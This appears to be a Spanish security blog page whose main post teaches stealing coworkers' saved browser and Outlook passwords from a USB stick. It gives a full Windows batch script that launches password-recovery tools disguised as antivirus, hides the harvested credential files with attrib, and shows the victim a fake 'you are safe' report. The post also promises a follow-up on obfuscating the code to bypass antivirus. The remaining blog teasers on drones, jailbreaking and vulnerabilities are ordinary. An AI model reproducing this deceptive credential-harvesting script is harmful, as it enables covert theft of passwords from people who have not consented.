Hacking mediante un USB

¡ Buenas tardes compañeros !

 

A fin de éste año tengo la idea (ya casi confirmada) de rendir mi primera certificación de Seguridad Informática, en fin, la certificación CEH.

Leyendo una de las teorías, si mal no recuerdo era el capítulo de Malware, encontré ciertas herramientas para divertirnos con alguna PC de nuestros compañeros. Solo necesitaremos un USB y las herramientas que subí a este enlace, las cuales son las siguientes:

– Firefox-AV
– IE-AV

– Mail-AV

 

Éstas herramientas se encargan de buscar información que queda almacenada en nuestro navegador o en alguna cuenta asociada a nuestro correo electrónico (Outlook en éste caso) y nos revelarán sus contraseñas. En sí, es un proceso algo más largo pero no nos vamos a meter en detalles y vamos a disfrutar de las herramientas !

Una vez que los hayamos descargado, podemos ejecutarlos y ver su potencial. (Voy a tratar de buscar alguna herramienta que pueda recuperar la información de Chrome y luego actualizaré el post)

 

Pero si realmente queremos divertirnos un poco con algunos compañeros algo despistados, podemos hacerle creer que son AntiVirus (por eso el AV como sufijo) para nuestras aplicaciones del ordenador (Total, todo el mundo descarga AV’s falsos .. y .. quien desconfiaría de un hacker ahora ?)

Crearemos un simple script .bat con el siguiente fragmento:

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

@echo off cls echo "Generando un reporte del sistema, por favor aguarde ..." start MAIL-AV.exe /stext MAIL.txt start IE-AV.exe /stext IE.txt start FIREFOX-AV.exe /stext FIREFOX.txt timeout /t 5 cls echo "Finalizacion de registro de la memoria, por favor revise el archivo Resultados.txt \n \n" echo Estas completamente a salvo en tu sistema > Resultados.txt pause attrib +r +h +s FIREFOX.txt attrib +r +h +s IE.txt attrib +r +h +s MAIL.txt exit

Al cual llamaremos Launcher-AV.bat o como quieran.

Al ejecutarlo, guardaremos los resultados de nuestras herramientas en diferentes archivos de texto, para luego ocultarlos y quedarnos con esos datos (Tranquilos, todo está en el script). Al usuario solo le mostraremos un falso Resultados.txt.

 

Para luego poder recuperar los archivos ocultos pueden usar el siguiente comando:

 

?

1	attrib -r -h -s /s /d

 

 Como recomendaciones, les digo que traten de que el usuario ejecute estas herramientas dentro del Pendrive, para poder ya tener la información oculta en el mismo.

 

Espero que se diviertan .. pero CON CUIDADO !

Antes de finalizar, quisiera disculparme por mi mala programacion en .bat, hace mucho no tocaba este tema.

Ah, y me olvidaba. En la segunda parte vamos a aprender a ofuscar el código anterior y tratar de utilizar técnicas de encoding para bypassear AV’s. Ésta entrada la escribí para mi amigo SniferL4bs, donde también subiremos esa segunda parte pronto.

Desarrollan un malware para controlar y robar drones.

“Maldrone” es un malware para drones desarrollado para permitir al atacante tomar el control absoluto del dron y dirigirlo a donde quiera, o hacerlo caer.

Los drones se han hecho cada vez más populares tanto para la fotografía como para fines comerciales y, por supuesto, son el día a día de muchos ejércitos de distintos países. Pero más allá de sus propósitos militares, vemos modelos como los Parrot AR Drone que se convierten en el mejor amigo de cualquier fotógrafo o aficionado del vídeo, y Amazon planea usarlos como su servicio de entrega de paquetes en un futuro próximo.

Continue reading →

[OFFTOPIC] Mirá el Super Bowl gratis desde cualquier plataforma.

Habrá quien disfrute de esta opción, habrá quien no, pero lo cierto es que la televisión ha dejado de ser el único medio para disfrutar transmisiones de grandes eventos deportivos, como lo son los Juegos Olímpicos, el Mundial de futbol o el Super Bowl.

Para este domingo, día en el que se disputa el Super Bowl XLIX en el University of Phoenix Stadium en Glendale, Arizona, la plataforma UnoTelly ofrecerá transmisión del evento en HD, con comentaristas de las cadenas norteamericanas y, lo mejor de todo, gratis y de manera legal.

Continue reading →

Como bajar a iOS 8.1.2 para poder volver al Jailbreak.

Apple lanzó el pasado martes una nueva versión de iOS, en concreto la 8.1.3, para solucionar algunos fallos y mejorar el rendimiento en los dispositivos más castigados con la actualización a iOS 8. También incluyó la mejora de necesitar menos espacio para poder actualizar tu dispositivo sin necesidad de conectarlo a iTunes. Pero lo más destacable de esta actualización es que no puedes hacer Jailbreak, por lo que si para tí esto es un problema yquieres volver a iOS 8.1.2 para instalar Cydia en tu dispositivo, debes saber que es posible aún y te explicamos cómo hacerlo.

Este procedimiento es aún posible en el momento de publicar este artículo porque Apple aún firma la versión 8.1.2. En el momento en que deje de firmarla ya no habrá forma de poder bajar a esa versión, y una vez instalado iOS 8.1.3 en tu dispositivo tendrás que quedarte en esa versión sin posibilidad de bajar a otra. Os mantendremos informados de cuándo Apple deja de firmarlo y lo comunicaremos en este mismo tutorial.

Descargar iOS 8.1.2

Necesitarás descargar la versión 8.1.2 específica para tu dispositivo. Aquí tienes los enlaces para poder hacerlo desde los propios servidores de Apple:

iPhone

• iPhone 6
• iPhone 6 Plus
• iPhone 5s (CDMA)
• iPhone 5s (GSM)
• iPhone 5c (CDMA)
• iPhone 5c (GSM)
• iPhone 5 (CDMA)
• iPhone 5 (GSM)
• iPhone 4s

iPod Touch

• iPod touch 5G

iPad

• iPad Air 2 (Wi-Fi)
• iPad Air 2 (Celular)
• iPad Mini 3 (Wi-Fi)
• iPad Mini 3 (Celular)
• iPad Mini 3 (China)
• iPad Air (Celular)
• iPad Air (Wi-Fi)
• iPad Air (CDMA)
• iPad 4(CDMA)
• iPad 4(GSM)
• iPad 4(Wi-Fi)
• iPad Mini 2 (Celular)
• iPad Mini 2 (Wi-Fi)
• iPad Mini 2 (CDMA)
• iPad Mini (CDMA)
• iPad Mini (GSM)
• iPad Mini (Wi-Fi)
• iPad 3 (Wi-Fi)
• iPad 3 (Celular GSM)
• iPad 3 (Celular CDMA)
• iPad 2 (Wi-Fi Rev A)
• iPad 2 (Wi-Fi)
• iPad 2 (Wi-Fi + 3G GSM)
• iPad 2 (Wi-Fi + 3G CDMA)

Conectar tu dispositivo a iTunes

Conecta tu iPhone, iPad o iPod Touch a iTunes y realiza una copia de seguridad por lo que pudiera pasar. Una vez restaurado tu dispositivo puedes restaurar la copia de seguridad o configurarlo como nuevo, eso lo dejamos a tu elección.

Accede a iTunes, pulsa sobre el icono del iPhone, iPad o iPod Touch y en la pestaña Resumen pulsa sobre “Restaurar iPhone” con la tecla Alt (Mac OS X) o Shift (Windows) pulsada. Se abrirá entonces una ventana en la que te pedirá que le indiques qué archivo usar. Es el momento de seleccionar el archivo “ipsw” que te bajaste antes. Si te da error, asegúrate de que es el específico para tu dispositivo. Tras unos minutos, tu iPhone, iPod o iPad estará de nuevo con iOS 8.1.2 y podrás hacerle Jailbreak sin problemas

Fuente: ActualidadiPad.

 

¡Gracias por leer!

DynamicSec.

[¡FRAUDE!] Phishing a usuarios de Apple.

Una vez más, los usuarios de Apple ID, una cuenta necesaria para tomar parte de todas las actividades de Apple como comprar en iTunes o activar iCloud, reciben un nuevo intento de phishing a través sde su correo electrónico.

¡ Cuidado con este mensaje !

Continue reading →

Whatsapp permitirá grabar llamadas telefónicas.

Hace poco tiempo vimos como aparecía la carpeta WhatsApp Calls entre las que genera la app de mensajería instantánea. Así que se cree que las llamadas de voz (por VoIP) llegarán tras meses de retraso a WhatsApp. La causa de la tardanza parece que fue el intentar ofrecer llamadas de calidad bajo redes 2G y aprovechar bien la cancelación de ruido en Android. Y ahora sabemos que WhatsApp permitirá grabar llamadas en Android.

Continue reading →

APPIE, the Android Pentesting Portable Integrated Environment

APPIE es un paquete preconfigurado para funcionar como un entorno de Pentesting para Android. Es completamente portable, ya que puede ser transportado en una unidad USB. Ésta es una de las mejores respuestas a las tan necesitadas herramientas para los Análisis de Vulnerabilidades en éstos entornos.

Su excelente interfaz

Continue reading →

GHOST: Una vulnerabilidad en Linux de hace más de 10 años

Investigadores de la empresa de seguridad Qualys han descubierto un agujero de seguridad muy importante en la biblioteca de C de GNU Linux (glibc). La vulnerabilidad ya tiene nombre y imagen relacionada:GHOST (proviene de GetHOST), ha sido identificado como CVE-2015-0235 y permite tomar el control de sistemas Linux remotamente, sin conocer datos de autenticación como usuario y contraseña. Aquí se puede ver el video publicado por la empresa.

Continue reading →

ExploitTable 2014 + Buscador de Exploits = PWNED!

Durante el año 2014 se han conocido nuevas vulnerabilidades de diferentes plataformas que afectan a más de una especie en particular. Ubicarlas y acordarselas es una tarea algo dificil para los que estamos en éste ambiente, ya que la cabeza la tenemos por absolutamente todos lados.

Es por ello que en ésta ocasión, les muestro un pequeño documento que vi por Twitter (para los que aún no me conocen por ese medio, es @gaaabifranco) donde se detallan todas las vulnerabilidades encontradas el año pasado, y con posibilidad de buscar aquellas de años anteriores.

Continue reading →

Análisis de imágenes con Ghiro

En muchos casos los investigadores forenses necesitan procesar imágenes digitales como evidencia. En un análisis forense en el que se manejan muchas imágenes es difícil manejar tanta información al menos que se utilice una herramienta que facilite el trabajo.

Ghiro es una herramienta capaz de soportar gigas de imágenes, extraer y organizar la información y mostrarla en un informe en un formato agradable.
Todas las tareas están totalmente automatizadas, sólo tienes que cargar las imágenes y dejar que Ghiro haga el trabajo.

Continue reading →